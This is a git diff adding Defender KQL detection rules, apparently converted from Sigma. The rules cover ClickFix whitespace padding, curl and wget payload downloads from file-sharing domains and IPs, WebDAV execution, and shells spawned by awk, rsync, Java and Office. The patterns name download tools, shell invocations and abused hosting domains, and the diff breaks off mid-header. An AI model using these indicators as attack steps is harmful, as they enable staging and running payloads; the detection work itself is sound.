file mode 100644 index 00000000..ed3f28b8 --- /dev/null +++ b/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-04 +// Level: high +// Description: Detects process creation with suspicious whitespace padding followed by a '#' character, which may indicate ClickFix or FileFix techniques used to conceal malicious commands from visual inspection. +ClickFix and FileFix are social engineering attack techniques where adversaries distribute phishing documents or malicious links that deceive users into opening the Windows Run dialog box or File Explorer search bar. +The victims are then instructed to paste commands from their clipboard, which contain extensive whitespace padding using various Unicode space characters to push the actual malicious command far to the right, effectively hiding it from immediate view. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 + +DeviceProcessEvents +| where (ProcessCommandLine contains "#" and FolderPath endswith "\\explorer.exe") and (ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains " ") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_file_characteristics_due_to_missing_fields.kql b/KQL/rules/Execution/suspicious_file_characteristics_due_to_missing_fields.kql new file mode 100644 index 00000000..498abae2 --- /dev/null +++ b/KQL/rules/Execution/suspicious_file_characteristics_due_to_missing_fields.kql @@ -0,0 +1,10 @@ +// Title: Suspicious File Characteristics Due to Missing Fields +// Author: Markus Neis, Sander Wiebing +// Date: 2018-11-22 +// Level: medium +// Description: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.006 + +DeviceProcessEvents +| where ((ProcessVersionInfoFileDescription =~ "?" and ProcessVersionInfoProductVersion =~ "?") or (ProcessVersionInfoFileDescription =~ "?" and ProcessVersionInfoProductName =~ "?") or (ProcessVersionInfoCompanyName =~ "?" and ProcessVersionInfoFileDescription =~ "?")) and FolderPath contains "\\Downloads\\" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_file_created_in_perflogs.kql b/KQL/rules/Execution/suspicious_file_created_in_perflogs.kql new file mode 100644 index 00000000..c8d27aee --- /dev/null +++ b/KQL/rules/Execution/suspicious_file_created_in_perflogs.kql @@ -0,0 +1,12 @@ +// Title: Suspicious File Created In PerfLogs +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-05 +// Level: medium +// Description: Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Unlikely + +DeviceFileEvents +| where (FolderPath endswith ".7z" or FolderPath endswith ".bat" or FolderPath endswith ".bin" or FolderPath endswith ".chm" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".py" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".zip") and FolderPath startswith "C:\\PerfLogs\\" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql b/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql new file mode 100644 index 00000000..61e252ec --- /dev/null +++ b/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql @@ -0,0 +1,10 @@ +// Title: Suspicious File Download From File Sharing Domain Via Curl.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-05 +// Level: high +// Description: Detects potentially suspicious file download from file sharing domains using curl.exe +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql b/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql new file mode 100644 index 00000000..d47202af --- /dev/null +++ b/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql @@ -0,0 +1,10 @@ +// Title: Suspicious File Download From File Sharing Domain Via Wget.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-05 +// Level: high +// Description: Detects potentially suspicious file downloads from file sharing domains using wget.exe +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_file_download_from_ip_via_curl_exe.kql b/KQL/rules/Execution/suspicious_file_download_from_ip_via_curl_exe.kql new file mode 100644 index 00000000..1bfaf062 --- /dev/null +++ b/KQL/rules/Execution/suspicious_file_download_from_ip_via_curl_exe.kql @@ -0,0 +1,10 @@ +// Title: Suspicious File Download From IP Via Curl.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-27 +// Level: high +// Description: Detects potentially suspicious file downloads directly from IP addresses using curl.exe +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where (ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".gif\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpeg\"" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".log\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".png\"" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".gif'" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".jpeg'" or ProcessCommandLine endswith ".log'" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".png'" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbs'") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe.kql b/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe.kql new file mode 100644 index 00000000..a1aa333b --- /dev/null +++ b/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe.kql @@ -0,0 +1,10 @@ +// Title: Suspicious File Download From IP Via Wget.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-27 +// Level: high +// Description: Detects potentially suspicious file downloads directly from IP addresses using Wget.exe +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe_paths.kql b/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe_paths.kql new file mode 100644 index 00000000..d11c2d3e --- /dev/null +++ b/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe_paths.kql @@ -0,0 +1,10 @@ +// Title: Suspicious File Download From IP Via Wget.EXE - Paths +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-23 +// Level: high +// Description: Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and ((ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Help\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Temporary Internet") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Pictures\\")) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_file_execution_from_internet_hosted_webdav_share.kql b/KQL/rules/Execution/suspicious_file_execution_from_internet_hosted_webdav_share.kql new file mode 100644 index 00000000..97f6799a --- /dev/null +++ b/KQL/rules/Execution/suspicious_file_execution_from_internet_hosted_webdav_share.kql @@ -0,0 +1,10 @@ +// Title: Suspicious File Execution From Internet Hosted WebDav Share +// Author: pH-T (Nextron Systems) +// Date: 2022-09-01 +// Level: high +// Description: Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains " net use http" and ProcessCommandLine contains "& start /b " and ProcessCommandLine contains "\\DavWWWRoot\\") and (ProcessCommandLine contains ".exe " or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".bat " or ProcessCommandLine contains ".vbs " or ProcessCommandLine contains ".ps1 ") and (FolderPath contains "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.EXE") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_greedy_compression_using_rar_exe.kql b/KQL/rules/Execution/suspicious_greedy_compression_using_rar_exe.kql new file mode 100644 index 00000000..6f4199fb --- /dev/null +++ b/KQL/rules/Execution/suspicious_greedy_compression_using_rar_exe.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Greedy Compression Using Rar.EXE +// Author: X__Junior (Nextron Systems), Florian Roth (Nextron Systems) +// Date: 2022-12-15 +// Level: high +// Description: Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents +| where ((FolderPath endswith "\\rar.exe" or ProcessVersionInfoFileDescription =~ "Command line RAR") or (ProcessCommandLine contains ".exe a " or ProcessCommandLine contains " a -m")) and ((ProcessCommandLine contains " -hp" and ProcessCommandLine contains " -r ") and ((ProcessCommandLine contains " " and ProcessCommandLine contains ":*.") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\*.") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\$Recycle.bin\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\PerfLogs\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Temp") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Users\\Public\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Windows\\") or ProcessCommandLine contains " %public%")) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_installer_package_child_process.kql b/KQL/rules/Execution/suspicious_installer_package_child_process.kql new file mode 100644 index 00000000..760de8a1 --- /dev/null +++ b/KQL/rules/Execution/suspicious_installer_package_child_process.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Installer Package Child Process +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-02-18 +// Level: medium +// Description: Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters +// MITRE Tactic: Execution +// Tags: attack.t1059, attack.t1059.007, attack.t1071, attack.t1071.001, attack.execution, attack.command-and-control +// False Positives: +// - Legitimate software uses the scripts (preinstall, postinstall) + +DeviceProcessEvents +| where (ProcessCommandLine contains "preinstall" or ProcessCommandLine contains "postinstall") and (FolderPath endswith "/sh" or FolderPath endswith "/bash" or FolderPath endswith "/dash" or FolderPath endswith "/python" or FolderPath endswith "/ruby" or FolderPath endswith "/perl" or FolderPath endswith "/php" or FolderPath endswith "/javascript" or FolderPath endswith "/osascript" or FolderPath endswith "/tclsh" or FolderPath endswith "/curl" or FolderPath endswith "/wget") and (InitiatingProcessFolderPath endswith "/package_script_service" or InitiatingProcessFolderPath endswith "/installer") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_interactive_powershell_as_system.kql b/KQL/rules/Execution/suspicious_interactive_powershell_as_system.kql new file mode 100644 index 00000000..53894525 --- /dev/null +++ b/KQL/rules/Execution/suspicious_interactive_powershell_as_system.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Interactive PowerShell as SYSTEM +// Author: Florian Roth (Nextron Systems) +// Date: 2021-12-07 +// Level: high +// Description: Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Administrative activity +// - PowerShell scripts running as SYSTEM user + +DeviceFileEvents +| where FolderPath in~ ("C:\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt", "C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\StartupProfileData-Interactive") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql b/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql new file mode 100644 index 00000000..193d7064 --- /dev/null +++ b/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Invocation of Shell via AWK - Linux +// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) +// Date: 2024-09-02 +// Level: high +// Description: Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function. +This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and (ProcessCommandLine contains "BEGIN {system" and (FolderPath endswith "/awk" or FolderPath endswith "/gawk" or FolderPath endswith "/mawk" or FolderPath endswith "/nawk")) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql b/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql new file mode 100644 index 00000000..caa45b9c --- /dev/null +++ b/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql @@ -0,0 +1,11 @@ +// Title: Suspicious Invocation of Shell via Rsync +// Author: Florian Roth +// Date: 2025-01-18 +// Level: high +// Description: Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.t1203 + +DeviceProcessEvents +| where ((FolderPath endswith "/ash" or FolderPath endswith "/bash" or FolderPath endswith "/csh" or FolderPath endswith "/dash" or FolderPath endswith "/ksh" or FolderPath endswith "/sh" or FolderPath endswith "/tcsh" or FolderPath endswith "/zsh") and (InitiatingProcessFolderPath endswith "/rsync" or InitiatingProcessFolderPath endswith "/rsyncd")) and (not(ProcessCommandLine contains " -e ")) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_java_children_processes.kql b/KQL/rules/Execution/suspicious_java_children_processes.kql new file mode 100644 index 00000000..b8db8b0d --- /dev/null +++ b/KQL/rules/Execution/suspicious_java_children_processes.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Java Children Processes +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-03 +// Level: high +// Description: Detects java process spawning suspicious children +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "bash" or ProcessCommandLine contains "dash" or ProcessCommandLine contains "ksh" or ProcessCommandLine contains "zsh" or ProcessCommandLine contains "csh" or ProcessCommandLine contains "fish" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "python") and InitiatingProcessFolderPath endswith "/java" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_microsoft_office_child_process_macos.kql b/KQL/rules/Execution/suspicious_microsoft_office_child_process_macos.kql new file mode 100644 index 00000000..79d8a015 --- /dev/null +++ b/KQL/rules/Execution/suspicious_microsoft_office_child_process_macos.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Microsoft Office Child Process - MacOS +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-01-31 +// Level: high +// Description: Detects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.t1059.002, attack.t1137.002, attack.t1204.002 + +DeviceProcessEvents +| where (FolderPath endswith "/bash" or FolderPath endswith "/curl" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/osacompile" or FolderPath endswith "/osascript" or FolderPath endswith "/sh" or FolderPath endswith "/zsh" or FolderPath endswith "/python" or FolderPath endswith "/python3" or FolderPath endswith "/wget") and (InitiatingProcessFolderPath contains "Microsoft Word" or InitiatingProcessFolderPath contains "Microsoft Excel" or InitiatingProcessFolderPath contains "Microsoft PowerPoint" or InitiatingProcessFolderPath contains "Microsoft OneNote") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_mshta_exe_execution_patterns.kql b/KQL/rules/Execution/suspicious_mshta_exe_execution_patterns.kql new file mode 100644 index 00000000..9c19282b --- /dev/null +++ b/KQL/rules/Execution/suspicious_mshta_exe_execution_patterns.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Mshta.EXE Execution Patterns +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-07-17 +// Level: high +// Description: Detects suspicious mshta process execution patterns +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1106 + +DeviceProcessEvents +| where ((FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") and ((ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Users\\Public\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe"))) or ((FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") and (not(((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\") or (ProcessCommandLine contains ".htm" or ProcessCommandLine contains ".hta") or (ProcessCommandLine endswith "mshta.exe" or ProcessCommandLine endswith "mshta"))))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_nohup_execution.kql b/KQL/rules/Execution/suspicious_nohup_execution.kql new file mode 100644 index 00000000..54098102 --- /dev/null +++ b/KQL/rules/Execution/suspicious_nohup_execution.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Nohup Execution +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-06-02 +// Level: high +// Description: Detects execution of binaries located in potentially suspicious locations via "nohup" +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where ProcessCommandLine contains "/tmp/" and FolderPath endswith "/nohup" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_outlook_child_process.kql b/KQL/rules/Execution/suspicious_outlook_child_process.kql new file mode 100644 index 00000000..cb6d6729 --- /dev/null +++ b/KQL/rules/Execution/suspicious_outlook_child_process.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Outlook Child Process +// Author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team +// Date: 2022-02-28 +// Level: high +// Description: Detects a suspicious process spawning from an Outlook process. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 + +DeviceProcessEvents +| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql b/KQL/rules/Execution/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql new file mode 100644 index 00000000..55de894c --- /dev/null +++ 